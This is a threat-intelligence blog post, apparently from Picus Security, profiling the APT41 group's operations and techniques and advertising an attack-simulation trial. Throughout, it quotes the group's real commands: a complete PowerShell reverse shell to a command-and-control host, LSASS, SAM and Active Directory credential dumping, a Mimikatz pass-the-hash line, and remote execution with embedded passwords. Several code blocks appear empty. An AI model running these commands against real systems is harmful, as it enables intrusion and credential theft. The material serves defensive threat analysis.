APT41 is a prolific and highly skilled threat actor, active since at least 2007, that distinguishes itself by conducting simultaneous cyber espionage and financially motivated cybercrime operations. This dual-focus, evident since 2014, targets a vast array of sectors, from U.S. state governments to global shipping, logistics, and technology companies. The group is known for its persistence, maintaining long-term unauthorized access for months or even years. A key characteristic of APT41 is its exceptional agility in weaponizing vulnerabilities. Notably, they began exploiting the critical Log4Shell (CVE-2021-44228) vulnerability against at least two U.S. state governments within hours of its public disclosure.
The group's tactics, techniques, and procedures (TTPs) demonstrate a high level of operational sophistication. Their primary initial access vector is the exploitation of public-facing applications, rapidly weaponizing both n-day and zero-day flaws in Citrix, Zoho, Cisco, and other software. Once inside, APT41 masters "living off the land," using a complex, multi-stage delivery process for payloads like Cobalt Strike that relies on built-in Windows utilities like cmd.exe and certutil. They establish persistence through a variety of methods, including creating disguised Windows Services, deploying web shells, and using Scheduled Tasks. For credential access, they are comprehensive, using tools like Mimikatz to dump LSASS memory and built-in utilities like ntdsutil to steal the entire Active Directory database. To evade detection, they employ custom injectors to bypass logging, obfuscate their tools, and exfiltrate stolen data to legitimate cloud services like OneDrive to blend in with normal network traffic.
In this post, we will explore the major historical operations of APT41, highlight their notable campaigns against government and commercial sectors, and examine the group’s tactics, techniques, and procedures to understand how they execute persistent cyber attacks. In the end, we will show how Picus helps defend against this group.
Simulate APT Attacks with 14-Day Free Trial of Picus Platform
The threat actor utilizes various tools for actively scanning target organizations to find vulnerabilities. This includes using vulnerability scanners like Acunetix and network scanners such as Nmap for identifying open ports and services.
|
# Basic Nmap scan with service version detection |
Hidden directories and subdomains are discovered by brute-forcing web directories with utilities including OneForAll, subdomain3, subDomainsBrute, and Sublist3r.
Specialized scanning is also performed. For instance, JexBoss is used to specifically find and exploit vulnerabilities within JBoss application servers [6].
|
# Example: Scanning a host for JBoss vulnerabilities |
Exploiting public-facing applications is a primary initial access vector for this group, which demonstrates agility in weaponizing both n-day and zero-day vulnerabilities.
A mapping of exploited CVEs includes:
.NET deserialization attacks are conducted, frequently targeting ASP.NET applications. These attacks use malicious ViewStates created with the YSoSerial.NET tool to achieve code execution.
SQLmap is also launched in various attacks [6]:
|
python sqlmap.py -r [Company1_domain].txt --tamper=space2comment --random-agent -p ctl00%24ContentPlaceHolder1%24txtUserName,ctl00%24ContentPlaceHolder1%24txtPassword --os-shell |
To gain initial compromise, spearphishing emails with malicious Compiled HTML (.chm) file attachments are used for the surgical targeting of specific individuals.
Windows Management Instrumentation (WMI) was also leveraged in several malicious campaigns for execution [6].
|
wmic /node:172.19.97.102 /user:{redacted}\{redacted} /password:P$ssw0rd0006 process call create "C:\users\Public\COMSysUpdate.exe"
|
The Task Scheduler is used to execute malicious files. This technique is applied both to machines where sessions are already established and to new machines identified during reconnaissance [6].
|
SCHTASKS /Create /S 192.168.100.19 /U "{redacted}\administrator" /P "!@#Virg0#@!" /RU SYSTEM /SC DAILY /TN Exec2022 /TR "C:\windows\system32\taskhosts.exe" |
PowerShell is used to obtain a reverse shell. The code is executed in stealth mode, enabling the compromised device to communicate with a command-and-control server and allowing for remote command execution [6].
|
powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('{redacted}', 80);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()" |
A notably complex, multi-stage process involving the Windows Command Shell (cmd.exe) was employed to deploy the Cobalt Strike Beacon payload [6], ensuring a covert and intact delivery.
The rundll32.exe binary is used to execute malicious loaders and payloads.
|
# Example generic command |
Windows services are commonly leveraged as a mechanism for both execution and persistence. Services are created and started to run malicious executables or scripts, like install.bat. This technique was observed in the ColunmTK campaign [6].
|
sc \\<IP> Create SuperIe binPath= "cmd.exe /k "c:\users\public\install.bat" |
In one intrusion, a combination of ANTSWORD and BLUEBEAM web shells was deployed for persistence. These web shells were discovered on a Tomcat Apache Manager server and had been active since at least 2023. They were used to execute certutil.exe for downloading the DUSTPAN dropper, which in turn stealthily loaded the BEACON payload [5].
New Windows services are created to maintain persistence [6].
|
sc \\172.26.16.81 Create SuperIe binPath= "cmd.exe /k c:\users\public\SecurityHealthSystray.exe" |
The DUSTPAN malware was also made persistent through services, with one instance being named "Windows Defend" to avoid detection.
In some instances, malicious files were placed in the Startup folder on remote machines. This action ensures the file executes every time the operating system boots [6].
|
copy C:\temp\LxpSvc.exe "\\192.168.100.4\c$\Users\administrator.{redacted}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LxpSvc.exe" |
These techniques were employed to execute the DUSTTRAP malware. DLL side-loading was abused by using a legitimate program, the AhnLab uninstaller, to load the malicious DUSTTRAP payload. Other benign and code-signed Windows binaries were also used for this purpose.
To remain unnoticed in a victim's network, the threat actors used the well-known protection tool Themida to obfuscate their malicious files.
Encryption is used to hide malicious payloads from security products and analysis. The DUSTTRAP launcher was built to decrypt its payload using AES-128-CFB. Similarly, the DUSTPAN dropper was observed loading BEACON payloads that had been encrypted with ChaCha20.
Malware is disguised by naming it to match legitimate system files. For example, the DUSTPAN malware was observed being executed with names like w3wp.exe (a common IIS process) and conn.exe to blend in.
The group cleans up artifacts to hide its tracks, such as deleting database dumps after exfiltration.
Also when malicious files were no longer required, they were deleted from the host [6].
|
del C:\temp\LxpSvc.exe |
A more advanced variation involves the DUSTTRAP loader: it trojanizes a legitimate DLL in memory but then restores the original, clean file on disk. This is done to evade EDR solutions that perform scans "on file close."
File and directory permissions are modified, as seen in the following example [6].
|
icacls \\192.168.0.243\c$\www\{redacted}\test2.asp /grant IIS_IUSRS:F |
The memory of the Local Security Authority Subsystem Service (LSASS) process is another source of credentials, as it handles user logons and access tokens. The utilities Procdump and Mimikatz are used to dump the memory of this process [6].
|
procdump64.exe -accepteula -ma lsass.exe lsass.dmp |
Account data is also extracted from the Security Account Manager (SAM) database, which stores local account passwords. Attackers attempt to copy this database, either from its registry location (HKLM\SAM\SAM) using the reg save command or by accessing the binary file (%WINDIR%\System32\Config\SAM) via volume shadow copies [6].
|
reg save HKLM\SAM C:\perflogs \sam.save |
The Windows utility Ntdsutil was frequently used in 2021 campaigns. This tool is used to acquire a copy of the ntds.dit file, the Active Directory database, which contains user objects, group information, and password hashes for all domain users [6].
|
ntdsutil "ac i ntds" "ifm" "create full C:\perflogs\temp" q q ntdsutil "activate instance ntds" "ifm" "create full C:\PerfLogs\temp" quit quit |
A search is conducted across files and directories for strings containing keywords like "user" or "password" to find unsecured credentials [6].
|
findstr /c:"User" /c:"Password" /si web.config |
A tool called BrowserGhost is used to obtain stored credentials from web browsers [6].
|
BrowserGhost.exe >> iis.txt |
The registry is queried to find information such as current RDP port configurations or network settings [6].
|
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber" |
Network configuration information is obtained by directly querying specific registry keys [6].
|
reg query "HKEY_LOCAL_MACHINE \SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{1f777394-0b42-11e3-80ad-806e6f6e6963}" |
The Ping command, often within a FOR loop, is used with single echo requests to identify other live devices on the local network [6].
The SETSPN utility is also used to discover which domain devices are running specific services, such as IIS, SQL, and MSSQL [6].
|
ping -n 1 PIST-FILE-SRV |
The publicly available tool cping is used to identify local computers that are vulnerable to SMB attacks [6].
|
C:\PerfLogs\cping40.exe scan smbvul 10.0.0.1 10.0.10.1 > 10.txt |
The built-in netstat utility is used to identify active network connections [6].
|
netstat -ano |
Reconnaissance is conducted on remote devices to determine if specific files, which had been previously downloaded, are currently running.
|
tasklist /pid 1428 /f |
A list of users and computers within specific high-privilege Windows groups is obtained.
|
net group "Domain Admins" /domain |
Basic system configuration information, such as the Windows version and system architecture, is gathered.
|
echo %PROCESSOR_ARCHITECTURE% |
The Net utility is used to gather information about domain group memberships and collect lists of administrators.
|
net user /domain > 1.txt |
The domain time is checked, often to synchronize malicious activities or understand logging timestamps.
|
net time /domain |
Attempts are made to detect available network shares and drives [6].
|
net share |
Domain trust relationships are enumerated.
|
dsquery site |
The sekurlsa::pth module of Mimikatz is used to perform PtH attacks [6].
|
mimikatz's sekurlsa::pth /user:Administrator /domain:{redacted} /ntlm:{redacted} /run:"%COMSPEC% /c echo 70c64df2976 > \\.\pipe\277bf3" |
Tools and payloads are transferred to other systems on the network [6].
|
jump psexec64 {redacted} dns windows/beacon_dns/reverse_dns_txt (ns1.colunm.tk:53) on {redacted} via Service Control Manager (\\[redacted]\ADMIN$\c3632b3.exe) |
Files are collected from the local system, including from volume shadow copies and the Windows logging system [6].
|
vssadmin list shadows |
Data is compressed using an archiving utility before exfiltration, likely to reduce file size and detection. The rar utility was observed being used to archive data downloaded from internal Oracle databases.
A portable archiver (like 7z.exe) is often downloaded to the compromised device, used to archive the target files, and then the archive is exfiltrated [6].
|
7z.exe a syslog.7z Intl |
In one case involving a software developer, access was gained to a private GitHub repository. This repository stored sensitive data, including credentials for remote servers, private certificates, and server lists [6].
|
shell git clone "ssh://jenkins@{redacted}:29418/DevOps/Playbook2" |
Communication with C&C servers is established using HTTP and HTTPS listeners [6].
|
port proto domains |
DNS tunnels are also used as a method to hide C&C communication [6].
|
port proto domains |
A tool called FRPC is often used to proxy traffic during the attacks [6].
|
frcp.exe -c frcp.ini |
Cobalt Strike is used to upload files onto compromised devices. In some targeted attacks, these files were uploaded from special directories named specifically for the victim organization [6].
|
upload C:\Users\Administrator\Desktop\cs\dns\COMSysUpdate.ocx |
During the exfiltration stage, various server configurations, backup data, and user data were accessed and stolen [6].
|
download D:\projects\{redacted}\web.config; |
Stolen data was exfiltrated to legitimate cloud services, specifically OneDrive, to blend in with normal network traffic. This was accomplished using PINEGROVE, a command-line tool designed to upload files to OneDrive using its API.
We also strongly suggest simulating APT41 Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for APT41:
|
Threat ID |
Threat Name |
Attack Module |
|
27065 |
APT41 Threat Group Campaign Malware Email Threat |
Network Infiltration |
|
25568 |
APT41 Threat Group Campaign Malware Download Threat |
Network Infiltration |
|
72247 |
APT41 Threat Group Campaign |
Windows Endpoint |
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.
APT41 is also known as: Wicked Panda, Brass Typhoon, BARIUM, Amoeba, BRONZE ATLAS, BRONZE EXPORT, Blackfly, Double Dragon, Earth Baku, G0044, G0096, Grayfly, HOODOO, LEAD, Leopard Typhoon, Red Kelpie, TA415, TG-2633, WICKED PANDA, WICKED SPIDER, Winnti, Pigfish.
References
[1] “APT41 Chinese Cyber Threat Group,” Google Cloud Blog. Accessed: Nov. 11, 2025. [Online]. Available: https://cloud.google.com/blog/topics/threat-intelligence/apt41-dual-espionage-and-cyber-crime-operation
[2] Accessed: Nov. 11, 2025. [Online]. Available: https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf
[3] “APT41 Initiates Intrusion Campaign Using Multiple Exploits,” Google Cloud Blog. Accessed: Nov. 11, 2025. [Online]. Available: https://cloud.google.com/blog/topics/threat-intelligence/apt41-initiates-global-intrusion-campaign-using-multiple-exploits/
[4] “APT41 Targeting U.S. State Government Networks,” Google Cloud Blog. Accessed: Nov. 11, 2025. [Online]. Available: https://cloud.google.com/blog/topics/threat-intelligence/apt41-us-state-governments
[5] “APT41 Has Arisen From the DUST,” Google Cloud Blog. Accessed: Nov. 11, 2025. [Online]. Available: https://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust
[6] N. R. A. Head-ASM, TI, and DRP, “APT41 World Tour 2021 on a tight schedule,” Group-IB. Accessed: Nov. 14, 2025. [Online]. Available: https://www.group-ib.com/blog/apt41-world-tour-2021/